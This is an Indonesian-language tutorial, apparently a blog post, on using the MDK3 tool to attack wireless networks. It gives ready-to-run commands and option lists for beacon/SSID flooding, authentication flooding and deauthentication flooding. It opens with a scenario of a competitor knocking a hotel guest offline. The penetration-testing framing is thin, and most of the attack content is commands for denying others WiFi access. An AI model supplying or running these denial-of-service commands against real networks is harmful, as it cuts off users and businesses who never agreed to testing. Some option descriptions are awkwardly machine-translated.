MDK3 adalah singkatan dari Murder Death Kill 3. Dan itu adalah alat yang pasti sesuai dengan namanya. Karena dirancang khusus untuk lingkungan WLAN, MDK3 melakukan pekerjaan luar biasa dalam menghancurkan akses jaringan nirkabel dengan mengirimkan banjir lalu lintas sekaligus. Banjir lalu lintas menghalangi orang lain untuk dapat terhubung.
Bayangkan Anda adalah seorang CEO dari sebuah bisnis kecil. Anda bepergian untuk bekerja, dan terhubung ke koneksi WiFi hotel. Sangat penting bagi Anda untuk mengirimkan beberapa informasi malam ini. Tetapi apa yang terjadi ketika pesaing Anda duduk di kamar sebelah, dan dia membanting laptop Anda dengan paket mdk3? Anda tidak akan bisa menyelesaikan apa pun, itulah yang terjadi. Anda mungkin kehilangan kontrak penting sebagai akibatnya. Bisnis Anda mungkin menderita. Jadi sekarang Anda melihat betapa berbahayanya serangan penolakan layanan. Mereka tidak menghancurkan data atau mencurinya, tetapi mereka adalah alat yang sempurna untuk pembunuhan reputasi.
Memulai dengan MDK3 – DoS WiFi Hacking
Sebagai prasyarat, pastikan adaptor nirkabel Anda dalam mode injeksi paket, jika tidak, ini tidak akan berfungsi sama sekali. Untuk menempatkan adaptor wifi ke mode injeksi paket, lihat tautan di atas atau gunakan sintaks di bawah ini untuk mendapatkan ide:
airmon-ng start <wireless interface>
Mari kita uji AP nirkabel kita, bernama “peretasan WiFi” terhadap serangan DoS nirkabel. MDK3 diinstal secara default di versi terbaru Back Track dan Kali Linux. Untuk mengakses alat dari Back Track 5 R3, masuk ke Applications -> Back Track -> Stress Testing -> WLAN Stress Testing.
Pilih MDK3 dari daftar. Untuk mengaksesnya dari Kali Linux, MDK3 harus diluncurkan dengan menu bantuan yang sudah dicetak di layar. Pastikan untuk melihat daftar mode pengujian satu per satu. Jangan menjadi profesional keamanan yang menyebalkan, jadilah orang yang sangat baik. TAHU bagaimana hal ini bekerja. Karena meskipun MDK3 adalah alat bukti konsep yang luar biasa, ia tidak memiliki halaman manual dan opsi bantuan agak terbatas. Anda sudah cukup menguasai alat ini. Tapi merangkulnya dan mempelajari alat ini dengan cara kuno, dengan coba-coba. Lebih banyak bantuan verbose tersedia dengan menjalankan:
mdk3 –fullhelp
SSID Flooding dengan MDK3
Satu trik rapi yang dapat dilakukan MDK3 adalah SSID flooding, atau beacon flooding. Artinya, MDK3 dapat menyiarkan ratusan bahkan ribuan titik akses palsu. Orang lain yang berada di area tersebut akan melihat semua titik akses palsu ini ketika mereka pergi mencari titik akses WiFi untuk disambungkan. Seperti yang mungkin Anda lihat, banjir SSID bukanlah penolakan layanan. Namun, ini masih trik yang cukup keren. Secara potensial, Anda dapat menyiapkan komputer khusus dengan titik akses nirkabel dan menjalankan MDK3 dalam mode banjir SSID setiap saat. Akibatnya, Anda dapat menyembunyikan titik akses nirkabel Anda yang sah di lautan titik akses palsu. Semacam keamanan melalui ketidakjelasan untuk mencegah serangan peretasan WiFi.
Berikut adalah sintaks untuk mengaktifkan banjir SSID sederhana (MDK3 akan menghasilkan nama titik akses palsu acak:
mdk3 <interface> b -c 1
Cukup ganti <interface> dengan nama antarmuka nirkabel Anda. Ingat, biasanya mon0.
Opsi b memberi tahu MDK3 untuk menggunakan mode flooding beacon / SSID.
-c1 memberitahu MDK3 untuk menyiarkan semua titik akses palsu pada saluran 1. (Untuk menyembunyikan fakta bahwa ini semua adalah titik akses palsu, Anda dapat mencoba menjalankan beberapa contoh MDK3 dan menentukan saluran yang berbeda setiap saat.
Anda juga dapat menentukan daftar nama SSID tertentu dari file dengan menambahkan perintah di atas dengan:
-f <nama file>
Misalkan AP nirkabel bisnis Anda disiarkan sebagai “Bisnis ACME”. Anda ingin menggunakan mode flooding SSID MDK3 untuk menyembunyikan titik akses Anda di antara sekelompok titik akses yang memiliki nama serupa tetapi memikat. Anda dapat membuat file teks bernama “SSID” dan mengisinya dengan nama titik akses palsu, mungkin nama seperti “ACME WiFi” “ACME Network” “WiFi ACME”. Kemudian, untuk menyatukan semua ini, Anda cukup menjalankan:
mdk3 <interface> b -c 1 -f SSIDs
Ada banyak opsi yang memungkinkan untuk mode flooding SSID:
b – Mode Banjir Suar
Ini menipu banyak sekali SSID. Ingat, keamanan melalui ketidakjelasan
PILIHAN:
-n <ssid>
Gunakan SSID khusus <ssid>, bukan yang dibuat secara acak
-f <filename>
Membaca SSID dari file
-v <filename>
Membaca alamat MAC dan SSID dari file.
-d
Tampilkan AP Ad-Hoc
-w
Setel bit WEP (Menghasilkan jaringan terenkripsi)
-g
Tampilkan AP sebagai 54 Mbit
-t
Tampilkan AP menggunakan enkripsi WPA TKIP
-Sebuah
Tampilkan AP menggunakan enkripsi WPA AES
-m
Gunakan MAC titik akses yang valid dari database OUI
-h
Masuk ke saluran tempat AP di-spoofing
-c <chan>
Memalsukan AP di saluran <chan>.
-s <pps>
Atur kecepatan DoS dalam paket per detik (default: 50)
Otentikasi Flooding dengan MDK3
Pindah ke opsi DOS MDK3 yang sebenarnya, pertama-tama Anda akan melihat otentikasi flooding, kemudian diakhiri dengan deauthentication flooding. Ide di balik otentikasi flooding itu sederhana. Terlalu banyak permintaan otentikasi pada satu waktu dapat menyebabkan titik akses nirkabel membeku dan mungkin berhenti bekerja sepenuhnya (sampai seseorang melakukan boot ulang).
Saya akan memperingatkan Anda bahwa menurut pengalaman saya, autentikasi flooding tidak selalu berfungsi. Sebagian besar titik akses nirkabel cukup kuat untuk menangani banjir otentikasi dari satu contoh MDK3. (Namun, jika Anda memiliki beberapa laptop yang menjalankan otentikasi banjir, ini mungkin berfungsi.)
Deauthentication flooding bekerja JAUH lebih baik (itulah sebabnya saya menyimpannya untuk yang terakhir) dan tidak memerlukan sumber daya seperti yang dilakukan oleh autentikasi flooding. Jadi mari kita lihat pembanjiran otentikasi. Perintah sederhana untuk melakukan otentikasi flooding adalah:
mdk3 <interface> a -a <ap_mac address>
The list of all possible options are below:
a – Authentication DoS mode
Send authentication frames to all APs found in range. By flooding the target AP with authentication requests, we can try to knock it offline.
OPTIONS:
-a <ap_mac address>
You need the access point’s MAC address, which can be obtained with airodump
-m
Use a valid client MAC from OUI database
-c
Don’t check that the test was successful, just run the attack
-i <ap_mac>
Performs an intelligent test on the access point (-a and -c will be ignored). This test connects clients to the AP and reinjects sniffed data to keep them alive
-s <pps>
Sets the speed in packets per second (Default: unlimited)
Deauthentication Flooding dengan MDK3
Teknik peretasan DoS WiFi yang bekerja paling baik menggunakan permintaan deauthenticate daripada memalsukan permintaan otentikasi.
mdk3 <interface> d -b blacklist_file
Sekali lagi, satu-satunya hal yang Anda butuhkan adalah alamat MAC titik akses target. Simpan alamat MAC itu dalam file teks dan tentukan setelah opsi -b. Ini akan mengirimkan paket deauth ke setiap dan semua klien yang terhubung ke titik akses yang ditentukan dalam file. (Anda dapat menambahkan lebih banyak alamat MAC ke deauth jika Anda mengevaluasi beberapa AP dalam jangkauan.
d – Mode Amuk Deauthentication / Disassociation
Tendangan semua orang ditemukan dari AP
PILIHAN:
-w <filename>
Baca file yang berisi alamat MAC untuk diabaikan (mode Daftar putih)
-b <filename>
Membaca dari file yang berisi alamat MAC yang akan diserang (Mode Daftar Hitam)
-s <pps>
Atur kecepatan dalam paket per detik (Default: tidak terbatas)
-c [chan, chan, chan, …]
Mengaktifkan lompatan saluran. Tanpa menyediakan saluran apa pun, mdk3 akan melompati semua saluran hingga menemukan target yang Anda tentukan
Jadi begitulah. Berbagai cara untuk melakukan serangan peretasan DoS WiFi menggunakan utilitas MDK3. Semoga berhasil dalam pengujian penetrasi dan karier keamanan jaringan Anda!
Jika Anda menikmati ini, silakan bagikan dengan yang lain
